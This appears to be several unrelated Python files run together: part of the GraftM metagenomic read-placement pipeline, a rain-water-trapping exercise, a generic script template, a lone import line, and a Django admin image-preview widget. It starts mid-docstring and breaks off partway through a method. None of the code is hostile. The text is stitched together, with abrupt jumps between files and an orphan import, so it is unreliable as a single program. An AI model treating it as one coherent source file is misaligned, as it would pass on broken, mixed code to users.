            dictionary of placements with entry as the key, a taxonomy string
            as the value
        reverse_pipe : bool
            True = run reverse pipe, False = run normal pipeline
        times : array
            list of the recorded times for each step in the pipeline in the
            format: [search_step_time, alignment_step_time, placement_step_time]
        hit_read_count_list : array
            list containing sublists, one for each file run through the GraftM
            pipeline, each two entries, the first being the number of putative
            eukaryotic reads (when searching 16S), the second being the number
            of hits aligned and placed in the tree.
        max_samples_for_krona: int
            If the number of files processed is greater than this number, then
            do not generate a krona diagram.
        Returns
        -------
        Nothing.
        '''

        # Write the per-sample read taxonomy files and collect the placements
        # for the combined outputs below.
        placements_list = []
        for base in base_list:
            placements = trusted_placements[base]
            self.s.readTax(placements,
                           GraftMFiles(base, self.args.output_directory,
                                       False).read_tax_output_path(base))
            placements_list.append(placements)

        logging.info('Writing summary table')
        with open(self.gmf.combined_summary_table_output_path(), 'w') as f:
            self.s.write_tabular_otu_table(base_list, placements_list, f)

        logging.info('Writing biom file')
        with biom_open(self.gmf.combined_biom_output_path(), 'w') as f:
            biom_successful = self.s.write_biom(base_list, placements_list, f)
        # Don't leave a half-written biom file behind.
        if not biom_successful:
            os.remove(self.gmf.combined_biom_output_path())

        logging.info('Building summary krona plot')
        if len(base_list) > max_samples_for_krona:
            # logging.warn is a deprecated alias; use logging.warning.
            logging.warning("Skipping creation of Krona diagram since there are too many input files. The maximum can be overridden using --max_samples_for_krona")
        else:
            self.s.write_krona_plot(base_list, placements_list, self.gmf.krona_output_path())

        # Basic statistics
        placed_reads = [len(trusted_placements[base]) for base in base_list]
        self.s.build_basic_statistics(times, hit_read_count_list, placed_reads,
                                      base_list, self.gmf.basic_stats_path())

        # Delete unnecessary intermediate files. The same set of paths is
        # removed per direction; in the reverse pipeline both the 'forward'
        # and 'reverse' outputs exist, otherwise only the undirected (False)
        # outputs do. Note: self.gmf is intentionally (re)assigned here, as
        # before, so it keeps its original post-call value.
        logging.info('Cleaning up')
        for base in base_list:
            directions = ['forward', 'reverse'] if reverse_pipe else [False]
            for direction in directions:
                self.gmf = GraftMFiles(base, self.args.output_directory,
                                       direction)
                self.hk.delete([self.gmf.for_aln_path(base),
                                self.gmf.rev_aln_path(base),
                                self.gmf.conv_output_rev_path(base),
                                self.gmf.conv_output_for_path(base),
                                self.gmf.euk_free_path(base),
                                self.gmf.euk_contam_path(base),
                                self.gmf.readnames_output_path(base),
                                self.gmf.sto_output_path(base),
                                self.gmf.orf_titles_output_path(base),
                                self.gmf.orf_output_path(base),
                                self.gmf.output_for_path(base),
                                self.gmf.output_rev_path(base)])

        logging.info('Done, thanks for using graftM!\n')

    def graft(self):
        # The Graft pipeline:
        # Searches for reads using hmmer, and places them in phylogenetic
        # trees to derive a community structure.
        if self.args.graftm_package:
            gpkg = GraftMPackage.acquire(self.args.graftm_package)
        else:
            gpkg = None

        REVERSE_PIPE        = (True if self.args.reverse else False)
        INTERLEAVED         = (True if self.args.interleaved else False)
        base_list           = []
        seqs_list           = []
        search_results      = []
        hit_read_count_list = []
        db_search_results   = []


        if gpkg:
            maximum_range = gpkg.maximum_range()

            if self.args.search_diamond_file:
                self.args.search_method = self.hk.DIAMOND_SEARCH_METHOD
                diamond_db = self.args.search_diamond_file[0]
            else:
                diamond_db = gpkg.diamond_database_path()
                if self.args.search_method == self.hk.DIAMOND_SEARCH_METHOD:
                    if not diamond_db:
                        logging.error("%s search method selected, but no diamond database specified. \
                        Please either provide a gpkg to the --graftm_package flag, or a diamond \
                        database to the --search_diamond_file flag." % self.args.search_method)
                        raise Exception()
        else:
            # Get the maximum range, if none exists, make one from the HMM profile
            if self.args.maximum_range:
                maximum_range = self.args.maximum_range
            else:
                if self.args.search_method==self.hk.HMMSEARCH_SEARCH_METHOD:
                    if not self.args.search_only:
                        maximum_range = self.hk.get_maximum_range(self.args.aln_hmm_file)
                    else:
                        logging.debug("Running search only pipeline. maximum_range not configured.")
                        maximum_range = None
                else:
                    logging.warning('Cannot determine maximum range when using %s pipeline and with no GraftM package specified' % self.args.search_method)
                    logging.warning('Setting maximum_range to None (linked hits will not be detected)')
                    maximum_range = None
            if self.args.search_diamond_file:
                diamond_db = self.args.search_diamond_file
            else:
                if self.args.search_method == self.hk.HMMSEARCH_SEARCH_METHOD:
                    diamond_db = None
                else:
                    logging.error("%s search method selected, but no gpkg or diamond database selected" % self.args.search_method)

        if self.args.assignment_method == Run.DIAMOND_TAXONOMIC_ASSIGNMENT:
            if self.args.reverse:
                logging.warn("--reverse reads specified with --assignment_method diamond. Reverse reads will be ignored.")
                self.args.reverse = None


        # If merge reads is specified, check that there are reverse reads to merge with
        if self.args.merge_reads and not hasattr(self.args, 'reverse'):
            raise Exception("Programming error")

        # Set the output directory if not specified and create that directory
        logging.debug('Creating working directory: %s' % self.args.output_directory)
        self.hk.make_working_directory(self.args.output_directory,
                                       self.args.force)

        # Set pipeline and evalue by checking HMM format
        if self.args.search_only:
            if self.args.search_method == self.hk.HMMSEARCH_SEARCH_METHOD:
                hmm_type, hmm_tc = self.hk.setpipe(self.args.search_hmm_files[0])
                logging.debug("HMM type: %s Trusted Cutoff: %s" % (hmm_type, hmm_tc))
        else:
            hmm_type, hmm_tc = self.hk.setpipe(self.args.aln_hmm_file)
            logging.debug("HMM type: %s Trusted Cutoff: %s" % (hmm_type, hmm_tc))

        if self.args.search_method == self.hk.HMMSEARCH_SEARCH_METHOD:
            setattr(self.args, 'type', hmm_type)
            if hmm_tc:
                setattr(self.args, 'evalue', '--cut_tc')
        else:
            setattr(self.args, 'type', self.PIPELINE_AA)

        if self.args.filter_minimum is not None:
            filter_minimum = self.args.filter_minimum
        else:
            if self.args.type == self.PIPELINE_NT:
                filter_minimum = Run.MIN_ALIGNED_FILTER_FOR_NUCLEOTIDE_PACKAGES
            else:
                filter_minimum = Run.MIN_ALIGNED_FILTER_FOR_AMINO_ACID_PACKAGES

        # Generate expand_search database if required
        if self.args.expand_search_contigs:
            if self.args.graftm_package:
                pkg = GraftMPackage.acquire(self.args.graftm_package)
            else:
                pkg = None
            boots = ExpandSearcher(
                search_hmm_files = self.args.search_hmm_files,
                maximum_range = self.args.maximum_range,
                threads = self.args.threads,
                evalue = self.args.evalue,
                min_orf_length = self.args.min_orf_length,
                graftm_package = pkg)

            # this is a hack, it should really use GraftMFiles but that class isn't currently flexible enough
            new_database = (os.path.join(self.args.output_directory, "expand_search.hmm") \
                            if self.args.search_method == self.hk.HMMSEARCH_SEARCH_METHOD \
                            else os.path.join(self.args.output_directory, "expand_search")
                            )

            if boots.generate_expand_search_database_from_contigs(
                                     self.args.expand_search_contigs,
                                     new_database,
                                     self.args.search_method):
                if self.args.search_method == self.hk.HMMSEARCH_SEARCH_METHOD:
                    self.ss.search_hmm.append(new_database)
                else:
                    diamond_db = new_database

        first_search_method = self.args.search_method
        if self.args.decoy_database:
            decoy_filter = DecoyFilter(Diamond(diamond_db, threads=self.args.threads),
                                       Diamond(self.args.decoy_database,
                                               threads=self.args.threads))
            doing_decoy_search = True
        elif self.args.search_method == self.hk.HMMSEARCH_AND_DIAMOND_SEARCH_METHOD:
            decoy_filter = DecoyFilter(Diamond(diamond_db, threads=self.args.threads))
            doing_decoy_search = True
            first_search_method = self.hk.HMMSEARCH_SEARCH_METHOD
        else:
            doing_decoy_search = False

        # For each pair (or single file passed to GraftM)
        logging.debug('Working with %i file(s)' % len(self.sequence_pair_list))
        for pair in self.sequence_pair_list:
            # Guess the sequence file type, if not already specified to GraftM
            unpack = UnpackRawReads(pair[0],
                                    self.args.input_sequence_type,
                                    INTERLEAVED)

            # Set the basename, and make an entry to the summary table.
            base = unpack.basename()
            pair_direction = ['forward', 'reverse']
            logging.info("Working on %s" % base)

            # Make the working base subdirectory
            self.hk.make_working_directory(os.path.join(self.args.output_directory,
                                                        base),
                                           self.args.force)

            # for each of the paired end read files
            for read_file in pair:
                unpack = UnpackRawReads(read_file,
                                        self.args.input_sequence_type,
                                        INTERLEAVED)
                if read_file is None:
                    # placeholder for interleaved (second file is None)
                    continue

                if not os.path.isfile(read_file): # Check file exists
                    logging.info('%s does not exist! Skipping this file..' % read_file)
                    continue

                # Set the output file_name
                if len(pair) == 2:
                    direction = 'interleaved' if pair[1] is None \
                                              else pair_direction.pop(0)
                    logging.info("Working on %s reads" % direction)
                    self.gmf = GraftMFiles(base,
                                           self.args.output_directory,
                                           direction)
                    self.hk.make_working_directory(os.path.join(self.args.output_directory,
                                                                base,
                                                                direction),
                                                   self.args.force)
                else:
                    direction = False
                    self.gmf = GraftMFiles(base,
                                           self.args.output_directory,
                                           direction)

                if self.args.type == self.PIPELINE_AA:
                    logging.debug("Running protein pipeline")
                    try:
                        search_time, (result, complement_information) = self.ss.aa_db_search(
                            self.gmf,
                            base,
                            unpack,
                            first_search_method,
                            maximum_range,
                            self.args.threads,
                            self.args.evalue,
                            self.args.min_orf_length,
                            self.args.restrict_read_length,
                            diamond_db
                        )
                    except NoInputSequencesException as e:
                        logging.error("No sufficiently long open reading frames were found, indicating"
                                      " either the input sequences are too short or the min orf length"
                                      " cutoff is too high. Cannot continue sorry. Alternatively, there"
                                      " is something amiss with the installation of OrfM. The specific"
                                      " command that failed was: %s" % e.command)
                        exit(Run.NO_ORFS_EXITSTATUS)

                # Or the DNA pipeline
                elif self.args.type == self.PIPELINE_NT:
                    logging.debug("Running nucleotide pipeline")
                    search_time, (result, complement_information)  = self.ss.nt_db_search(
                        self.gmf,
                        base,
                        unpack,
                        self.args.euk_check,
                        self.args.search_method,
                        maximum_range,
                        self.args.threads,
                        self.args.evalue
                    )

                reads_detected = True
                if not result.hit_fasta() or os.path.getsize(result.hit_fasta()) == 0:
                    logging.info('No reads found in %s' % base)
                    reads_detected = False



                if self.args.search_only:
                    db_search_results.append(result)
                    base_list.append(base)
                    continue

                # Filter out decoys if specified
                if reads_detected and doing_decoy_search:
                    with tempfile.NamedTemporaryFile(prefix="graftm_decoy", suffix='.fa') as f:
                        tmpname = f.name
                    any_remaining = decoy_filter.filter(result.hit_fasta(),
                                                        tmpname)
                    if any_remaining:
                        shutil.move(tmpname, result.hit_fasta())
                    else:
                        # No hits remain after decoy filtering.
                        os.remove(result.hit_fasta())
                        continue

                if self.args.assignment_method == Run.PPLACER_TAXONOMIC_ASSIGNMENT:
                    logging.info('aligning reads to reference package database')
                    hit_aligned_reads = self.gmf.aligned_fasta_output_path(base)

                    if reads_detected:
                        aln_time, aln_result = self.ss.align(
                                                            result.hit_fasta(),
                                                            hit_aligned_reads,
                                                            complement_information,
                                                            self.args.type,
                                                            filter_minimum
                                                            )
                    else:
                        aln_time = 'n/a'
                    if not os.path.exists(hit_aligned_reads): # If all were filtered out, or there just was none..
                        with open(hit_aligned_reads,'w') as f:
                            pass # just touch the file, nothing else
                    seqs_list.append(hit_aligned_reads)

                db_search_results.append(result)
                base_list.append(base)
                search_results.append(result.search_result)
                hit_read_count_list.append(result.hit_count)

        # Write summary table
        srchtw = SearchTableWriter()
        srchtw.build_search_otu_table([x.search_objects for x in db_search_results],
                                      base_list,
                                      self.gmf.search_otu_table())

        if self.args.search_only:
            logging.info('Stopping before alignment and taxonomic assignment phase\n')
            exit(0)


        if self.args.merge_reads: # not run when diamond is the assignment mode- enforced by argparse grokking
            logging.debug("Running merge reads output")
            if self.args.interleaved:
                fwd_seqs = seqs_list
                rev_seqs = []
            else:
                base_list=base_list[0::2]
                fwd_seqs = seqs_list[0::2]
                rev_seqs = seqs_list[1::2]
            merged_output=[GraftMFiles(base, self.args.output_directory, False).aligned_fasta_output_path(base) \
                           for base in base_list]
            logging.debug("merged reads to %s", merged_output)
            self.ss.merge_forev_aln(fwd_seqs, rev_seqs, merged_output)
            seqs_list=merged_output
            REVERSE_PIPE = False

        elif REVERSE_PIPE:
            base_list=base_list[0::2]

        # Leave the pipeline if search only was specified
        if self.args.search_and_align_only:
            logging.info('Stopping before taxonomic assignment phase\n')
            exit(0)
        elif not any(base_list):
            logging.error('No hits in any of the provided files. Cannot continue with no reads to assign taxonomy to.\n')
            exit(0)
        self.gmf = GraftMFiles('',
                               self.args.output_directory,
                               False)

        if self.args.assignment_method == Run.PPLACER_TAXONOMIC_ASSIGNMENT:
            clusterer=Clusterer()
            # Classification steps
            seqs_list=clusterer.cluster(seqs_list, REVERSE_PIPE)
            logging.info("Placing reads into phylogenetic tree")
            taxonomic_assignment_time, assignments=self.p.place(REVERSE_PIPE,
                                                                seqs_list,
                                                                self.args.resolve_placements,
                                                                self.gmf,
                                                                self.args,
                                                                result.slash_endings,
                                                                gpkg.taxtastic_taxonomy_path(),
                                                                clusterer)
            assignments = clusterer.uncluster_annotations(assignments, REVERSE_PIPE)

        elif self.args.assignment_method == Run.DIAMOND_TAXONOMIC_ASSIGNMENT:
            logging.info("Assigning taxonomy with diamond")
            taxonomic_assignment_time, assignments = self._assign_taxonomy_with_diamond(\
                        base_list,
                        db_search_results,
                        gpkg,
                        self.gmf)
            aln_time = 'n/a'
        else: raise Exception("Unexpected assignment method encountered: %s" % self.args.placement_method)
        
        self.summarise(base_list, assignments, REVERSE_PIPE,
                       [search_time, aln_time, taxonomic_assignment_time],
                       hit_read_count_list, self.args.max_samples_for_krona)

    @T.timeit
    def _assign_taxonomy_with_diamond(self, base_list, db_search_results,
                                      graftm_package, graftm_files):
        '''Run diamond to assign taxonomy

        Parameters
        ----------
        base_list: list of str
            list of sequence block names
        db_search_results: list of DBSearchResult
            the result of running hmmsearches
        graftm_package: GraftMPackage object
            Diamond is run against this database
        graftm_files: GraftMFiles object
            Result files are written here

        Returns
        -------
        list of
        1. time taken for assignment
        2. assignments i.e. dict of base_list entry to dict of read names to
            to taxonomies, or None if there was no hit detected.
        '''
        runner = Diamond(graftm_package.diamond_database_path(),
                         self.args.threads,
                         self.args.evalue)
        # Open the taxonomy/seqinfo files with context managers so the
        # handles are closed deterministically (previously they were opened
        # inline and leaked until garbage collection).
        with open(graftm_package.taxtastic_taxonomy_path()) as taxonomy_file, \
             open(graftm_package.taxtastic_seqinfo_path()) as seqinfo_file:
            taxonomy_definition = Getaxnseq().read_taxtastic_taxonomy_and_seqinfo(
                taxonomy_file, seqinfo_file)
        results = {}

        # For each of the search results,
        for i, search_result in enumerate(db_search_results):
            if search_result.hit_fasta() is None:
                # No hit sequences for this sample: record an empty mapping.
                sequence_id_to_taxonomy = {}
            else:
                sequence_id_to_hit = {}
                # Run diamond
                logging.debug("Running diamond on %s" % search_result.hit_fasta())
                diamond_result = runner.run(search_result.hit_fasta(),
                                            UnpackRawReads.PROTEIN_SEQUENCE_TYPE,
                                            daa_file_basename=graftm_files.diamond_assignment_output_basename(base_list[i]))
                for res in diamond_result.each([SequenceSearchResult.QUERY_ID_FIELD,
                                                SequenceSearchResult.HIT_ID_FIELD]):
                    if res[0] in sequence_id_to_hit:
                        # do not accept duplicates
                        if sequence_id_to_hit[res[0]] != res[1]:
                            raise Exception("Diamond unexpectedly gave two hits for a single query sequence for %s" % res[0])
                    else:
                        sequence_id_to_hit[res[0]] = res[1]

                # Extract taxonomy of the best hit, and add in the no hits
                sequence_id_to_taxonomy = {}
                for seqio in SequenceIO().read_fasta_file(search_result.hit_fasta()):
                    name = seqio.name
                    if name in sequence_id_to_hit:
                        # Add Root; to be in line with pplacer assignment method
                        sequence_id_to_taxonomy[name] = ['Root']+taxonomy_definition[sequence_id_to_hit[name]]
                    else:
                        # picked up in the initial search (by hmmsearch, say), but diamond misses it
                        sequence_id_to_taxonomy[name] = ['Root']

            results[base_list[i]] = sequence_id_to_taxonomy
        return results

    def main(self):

        if self.args.subparser_name == 'graft':
            if self.args.verbosity >= self._MIN_VERBOSITY_FOR_ART: print('''
                                GRAFT

                       Joel Boyd, Ben Woodcroft

                                                         __/__
                                                  ______|
          _- - _                         ________|      |_____/
           - -            -             |        |____/_
           - _     >>>>  -   >>>>   ____|
          - _-  -         -             |      ______
             - _                        |_____|
           -                                  |______
            ''')
            self.graft()

        elif self.args.subparser_name == 'create':
            if self.args.verbosity >= self._MIN_VERBOSITY_FOR_ART: print('''
                            CREATE

                   Joel Boyd, Ben Woodcroft

                                                    /
              >a                                   /
              -------------                       /
              >b                        |        |
              --------          >>>     |  GPKG  |
              >c                        |________|
              ----------
''')
            if self.args.dereplication_level < 0:
                logging.error("Invalid dereplication level selected! please enter a positive integer")
                exit(1)

            else:
                if not self.args.sequences:
                    if not self.args.alignment and not self.args.rerooted_annotated_tree \
                                               and not self.args.rerooted_tree:
                        logging.error("Some sort of sequence data must be provided to run graftM create")
                        exit(1)
                if self.args.taxonomy:
                    if self.args.rerooted_annotated_tree:
                        logging.error("--taxonomy is incompatible with --rerooted_annotated_tree")
                        exit(1)
                    if self.args.taxtastic_taxonomy or self.args.taxtastic_seqinfo:
                        logging.error("--taxtastic_taxonomy and --taxtastic_seqinfo are incompatible with --taxonomy")
                        exit(1)
                elif self.args.rerooted_annotated_tree:
                    if self.args.taxtastic_taxonomy or self.args.taxtastic_seqinfo:
                        logging.error("--taxtastic_taxonomy and --taxtastic_seqinfo are incompatible with --rerooted_annotated_tree")
                        exit(1)
                else:
                    if not self.args.taxtastic_taxonomy or not self.args.taxtastic_seqinfo:
                        logging.error("--taxonomy, --rerooted_annotated_tree or --taxtastic_taxonomy/--taxtastic_seqinfo is required")
                        exit(1)
                if bool(self.args.taxtastic_taxonomy) ^  bool(self.args.taxtastic_seqinfo):
                    logging.error("Both or neither of --taxtastic_taxonomy and --taxtastic_seqinfo must be defined")
                    exit(1)
                if self.args.alignment and self.args.hmm:
                    logging.warn("Using both --alignment and --hmm is rarely useful, but proceding on the assumption you understand.")
                if len([_f for _f in [self.args.rerooted_tree,
                                     self.args.rerooted_annotated_tree,
                                     self.args.tree] if _f]) > 1:
                    logging.error("Only 1 input tree can be specified")
                    exit(1)

                self.create.main(
                              dereplication_level = self.args.dereplication_level,
                              sequences = self.args.sequences,
                              alignment = self.args.alignment,
                              taxonomy = self.args.taxonomy,
                              rerooted_tree = self.args.rerooted_tree,
                              unrooted_tree = self.args.tree,
                              tree_log = self.args.tree_log,
                              prefix = self.args.output,
                              rerooted_annotated_tree = self.args.rerooted_annotated_tree,
                              min_aligned_percent = float(self.args.min_aligned_percent)/100,
                              taxtastic_taxonomy = self.args.taxtastic_taxonomy,
                              taxtastic_seqinfo = self.args.taxtastic_seqinfo,
                              hmm = self.args.hmm,
                              search_hmm_files = self.args.search_hmm_files,
                              force = self.args.force,
                              threads = self.args.threads
                              )

        elif self.args.subparser_name == 'update':
            logging.info("GraftM package %s specified to update with sequences in %s" % (self.args.graftm_package, self.args.sequences))
            if self.args.regenerate_diamond_db:
                gpkg = GraftMPackage.acquire(self.args.graftm_package)
                logging.info("Regenerating diamond DB..")
                gpkg.create_diamond_db()
                logging.info("Diamond database regenerated.")
                return
            elif not self.args.sequences:
                logging.error("--sequences is required unless regenerating the diamond DB")
                exit(1)

            if not self.args.output:
                if self.args.graftm_package.endswith(".gpkg"):
                    self.args.output = self.args.graftm_package.replace(".gpkg", "-updated.gpkg")
                else:
                    self.args.output = self.args.graftm_package + '-update.gpkg'

            Update(ExternalProgramSuite(
                ['taxit', 'FastTreeMP', 'hmmalign', 'mafft'])).update(
                    input_sequence_path=self.args.sequences,
                    input_taxonomy_path=self.args.taxonomy,
                    input_graftm_package_path=self.args.graftm_package,
                    output_graftm_package_path=self.args.output)

        elif self.args.subparser_name == 'expand_search':
            args = self.args
            if not args.graftm_package and not args.search_hmm_files:
                logging.error("expand_search mode requires either --graftm_package or --search_hmm_files")
                exit(1)

            if args.graftm_package:
                pkg = GraftMPackage.acquire(args.graftm_package)
            else:
                pkg = None

            expandsearcher = ExpandSearcher(search_hmm_files = args.search_hmm_files,
                maximum_range = args.maximum_range,
                threads = args.threads,
                evalue = args.evalue,
                min_orf_length = args.min_orf_length,
                graftm_package = pkg)
            expandsearcher.generate_expand_search_database_from_contigs(args.contigs,
                                                              args.output_hmm,
                                                              search_method=ExpandSearcher.HMM_SEARCH_METHOD)




        elif self.args.subparser_name == 'tree':
            if self.args.graftm_package:
                # shim in the paths from the graftm package, not overwriting
                # any of the provided paths.
                gpkg = GraftMPackage.acquire(self.args.graftm_package)
                if not self.args.rooted_tree: self.args.rooted_tree = gpkg.reference_package_tree_path()
                if not self.args.input_greengenes_taxonomy:
                    if not self.args.input_taxtastic_seqinfo:
                        self.args.input_taxtastic_seqinfo = gpkg.taxtastic_seqinfo_path()
                    if not self.args.input_taxtastic_taxonomy:
                        self.args.input_taxtastic_taxonomy = gpkg.taxtastic_taxonomy_path()

            if self.args.rooted_tree:
                if self.args.unrooted_tree:
                    logging.error("Both a rooted tree and an un-rooted tree were provided, so it's unclear what you are asking GraftM to do. \
If you're unsure see graftM tree -h")
                    exit(1)
                elif self.args.reference_tree:
                    logging.error("Both a rooted tree and reference tree were provided, so it's unclear what you are asking GraftM to do. \
If you're unsure see graftM tree -h")
                    exit(1)

                if not self.args.decorate:
                    logging.error("It seems a rooted tree has been provided, but --decorate has not been specified so it is unclear what you are asking graftM to do.")
                    exit(1)

                dec = Decorator(tree_path = self.args.rooted_tree)

            elif self.args.unrooted_tree and self.args.reference_tree:
                logging.debug("Using provided reference tree %s to reroot %s" % (self.args.reference_tree,
                                                                                 self.args.unrooted_tree))
                dec = Decorator(reference_tree_path = self.args.reference_tree,
                                tree_path = self.args.unrooted_tree)
            else:
                logging.error("Some tree(s) must be provided, either a rooted tree or both an unrooted tree and a reference tree")
                exit(1)

            if self.args.output_taxonomy is None and self.args.output_tree is None:
                logging.error("Either an output tree or taxonomy must be provided")
                exit(1)
            if self.args.input_greengenes_taxonomy:
                if self.args.input_taxtastic_seqinfo or self.args.input_taxtastic_taxonomy:
                    logging.error("Both taxtastic and greengenes taxonomy were provided, so its unclear what taxonomy you want graftM to decorate with")
                    exit(1)
                logging.debug("Using input GreenGenes style taxonomy file")
                dec.main(self.args.input_greengenes_taxonomy,
                         self.args.output_tree, self.args.output_taxonomy,
                         self.args.no_unique_tax, self.args.decorate, None)
            elif self.args.input_taxtastic_seqinfo and self.args.input_taxtastic_taxonomy:
                logging.debug("Using input taxtastic style taxonomy/seqinfo")
                dec.main(self.args.input_taxtastic_taxonomy, self.args.output_tree,
                         self.args.output_taxonomy, self.args.no_unique_tax,
                         self.args.decorate, self.args.input_taxtastic_seqinfo)
            else:
                logging.error("Either a taxtastic taxonomy or seqinfo file was provided. GraftM cannot continue without both.")
                exit(1)

        elif self.args.subparser_name == 'archive':
            # Back slashes in the ASCII art are escaped.
            if self.args.verbosity >= self._MIN_VERBOSITY_FOR_ART: print("""
                               ARCHIVE

                        Joel Boyd, Ben Woodcroft

                  ____.----.
        ____.----'          \\
        \\                    \\
         \\                    \\
          \\                    \\
           \\          ____.----'`--.__
            \\___.----'          |     `--.____
           /`-._                |       __.-' \\
          /     `-._            ___.---'       \\
         /          `-.____.---'                \\           +------+
        /            / | \\                       \\          |`.    |`.
       /            /  |  \\                   _.--'  <===>  |  `+--+---+
       `-.         /   |   \\            __.--'              |   |  |   |
          `-._    /    |    \\     __.--'     |              |   |  |   |
            | `-./     |     \\_.-'           |              +---+--+   |
            |          |                     |               `. |   `. |
            |          |                     |                 `+------+
            |          |                     |
            |          |                     |
            |          |                     |
            |          |                     |
            |          |                     |
            `-.        |                  _.-'
               `-.     |           __..--'
                  `-.  |      __.-'
                     `-|__.--'
            """)
            if self.args.create:
                if self.args.extract:
                    logging.error("Please specify whether to either create or export a GraftM package")
                    exit(1)
                if not self.args.graftm_package:
                    logging.error("Creating a GraftM package archive requires an package to be specified")
                    exit(1)
                if not self.args.archive:
                    logging.error("Creating a GraftM package archive requires an output archive path to be specified")
                    exit(1)

                archive = Archive()
                archive.create(self.args.graftm_package, self.args.archive,
                               force=self.args.force)

            elif self.args.extract:
                archive = Archive()
                archive.extract(self.args.archive, self.args.graftm_package,
                                force=self.args.force)
            else:
                logging.error("Please specify whether to either create or export a GraftM package")
                exit(1)




        else:
            raise Exception("Unexpected subparser name %s" % self.args.subparser_name)

# Rain_Water_Trapping
def trappedWater(a, size):
    """Return the volume of rain water trapped between bars of heights ``a``.

    Parameters
    ----------
    a : sequence of numbers
        Bar heights.
    size : int
        Number of bars to consider (normally ``len(a)``).

    Returns
    -------
    Total units of trapped water; 0 for empty input.
    """
    # Guard against empty input -- the original indexed a[0] unconditionally
    # and raised IndexError for size == 0.
    if size <= 0:
        return 0

    # left[i] stores height of tallest bar to the left of i, including itself
    left = [0] * size
    left[0] = a[0]
    for i in range(1, size):
        left[i] = max(left[i - 1], a[i])

    # right[i] stores height of tallest bar to the right of i, including itself
    right = [0] * size
    right[size - 1] = a[size - 1]
    for i in range(size - 2, -1, -1):
        right[i] = max(right[i + 1], a[i])

    # Water above bar i is bounded by the shorter of its two tallest walls.
    return sum(min(l, r) - h for l, r, h in zip(left, right, a))
    
# main program: read the tower heights from stdin, then report the result
n = int(input())                          # number of towers
arr = [int(input()) for _ in range(n)]    # height of each tower

print("Maximum water that can be accumulated is ", trappedWater(arr, len(arr)))
  
#Input:
#12
#0
#1
#0
#2
#1
#0
#1
#3
#2
#1
#2
#1
#Output:
#Maximum water that can be accumulated is  6


#!/usr/bin/env python
# -*- coding: utf-8 -*-
#
# TODO prog_base.py - A starting template for Python scripts
#
# Copyright 2013 Robert B. Hawkins
#
"""
SYNOPSIS

    TODO prog_base [-h,--help] [-v,--verbose] [--version]

DESCRIPTION

    TODO This describes how to use this script. This docstring
    will be printed by the script if there is an error or
    if the user requests help (-h or --help).

EXAMPLES

    TODO: Show some examples of how to use this script.

EXIT STATUS

    TODO: List exit codes

AUTHOR

    Rob Hawkins <webwords@txhawkins.net>

LICENSE

    This program is free software; you can redistribute it and/or
    modify it under the terms of the GNU General Public License
    as published by the Free Software Foundation; either version 2
    of the License, or (at your option) any later version.

    This program is distributed in the hope that it will be useful,
    but WITHOUT ANY WARRANTY; without even the implied warranty of
    MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
    GNU General Public License for more details.

    You should have received a copy of the GNU General Public License
    along with this program; if not, write to the Free Software
    Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA  02110-1301, USA.

VERSION

    1.0.0
"""
__author__    = "Rob Hawkins <webwords@txhawkins.net>"
__version__   = "1.0.0"
__date__      = "2013.12.01"

# Version   Date        Notes
# -------   ----------  -------------------------------------------------------
# 1.0.0     2013.12.01  Starting script template
#

import sys, os, traceback, argparse
import time
import re
#from pexpect import run, spawn

def test():
    """Run the script's test path (template placeholder)."""
    # TODO: Do something more interesting here...
    # Parenthesized single-argument print is valid Python 2 and 3; the
    # original Python-2 print statement is a syntax error under Python 3.
    print('Hello from the test() function!')

def main():
    """Script entry point (template placeholder)."""
    # TODO: Do something more interesting here...
    # Parenthesized single-argument print is valid Python 2 and 3; the
    # original Python-2 print statement is a syntax error under Python 3.
    print('Hello world!')

if __name__ == '__main__':
    try:
        start_time = time.time()
        parser = argparse.ArgumentParser(description='This is the program description')
        parser.add_argument('--version', action='version', version='%(prog)s v' + __version__)
        parser.add_argument('-v', '--verbose', action='store_true', help='produce verbose output')
        parser.add_argument('-t', '--test', action='store_true', help='run test suite')
        args = parser.parse_args()
        if args.verbose: print(time.asctime())
        if args.test:
            test()
        else:
            main()
        if args.verbose: print(time.asctime())
        # Equivalent to the original pair of prints (label then value on one line).
        if args.verbose: print('TOTAL TIME IN MINUTES:', (time.time() - start_time) / 60.0)
        sys.exit(0)
    # Python-3-compatible exception syntax ("except X as e"); the original
    # "except X, e" form is a syntax error under Python 3.
    except KeyboardInterrupt as e:  # Ctrl-C
        raise e
    except SystemExit as e:  # sys.exit()
        raise e
    except Exception as e:
        print('ERROR, UNEXPECTED EXCEPTION')
        print(str(e))
        traceback.print_exc()
        os._exit(1)

# -*- coding: utf-8 -*-

from exceptions import DropPage, AbortProcess

# -*- coding: utf-8 -*-
import re
from django.utils.safestring import mark_safe
from django.contrib.admin.widgets import AdminFileWidget
from django.template.defaultfilters import slugify
from django.utils.encoding import smart_text
from unidecode import unidecode
from django.forms.widgets import FILE_INPUT_CONTRADICTION, CheckboxInput, ClearableFileInput


class ImagePreviewWidget(AdminFileWidget):
    """Admin file widget that shows a thumbnail preview of the stored image
    and slugifies the names of newly uploaded files."""

    template_name = 'admin/attachment/widgets/preview_image_input.html'

    def render(self, name, value, attrs=None, renderer=None):
        # NOTE(review): super() is deliberately called on AdminFileWidget
        # itself, skipping AdminFileWidget.render -- presumably to bypass its
        # default markup; confirm before changing.
        output = []
        output.append(super(AdminFileWidget, self).render(name, value, attrs)) # really for AdminFileWidget
        # Prepend a clickable thumbnail when a stored image exists.
        # Assumes the related instance exposes `image` and `thumb` file
        # fields -- TODO confirm against the model.
        instance = getattr(value, 'instance', None)
        if instance is not None and value:
            output = ['<a target="_blank" href="%s"><img src="%s" alt="%s"/></a>' % \
                (instance.image.url, instance.thumb.url, instance.image)] + output
        return mark_safe(u''.join(output))

    def value_from_datadict(self, data, files, name):
        """Sanitise every uploaded file name, then resolve the field value,
        honouring the "clear" checkbox the same way ClearableFileInput does."""

        # Rewrite each uploaded name: keep the extension, replace punctuation
        # with '-', transliterate to ASCII and slugify the stem.
        for key, file in files.items():
            filename = file._get_name()
            ext = u""
            if '.' in filename:
                ext = u"." + filename.rpartition('.')[2]
            filename = filename.rpartition('.')[0]
            filename = re.sub(r'[_.,:;@#$%^&?*|()\[\]]', '-', filename)
            filename = slugify(unidecode(smart_text(filename))) + ext
            files[key]._set_name(filename)

        upload = super(ImagePreviewWidget, self).value_from_datadict(data, files, name)
        if not self.is_required and CheckboxInput().value_from_datadict(
                data, files, self.clear_checkbox_name(name)):

            if upload:
                # If the user contradicts themselves (uploads a new file AND
                # checks the "clear" checkbox), we return a unique marker
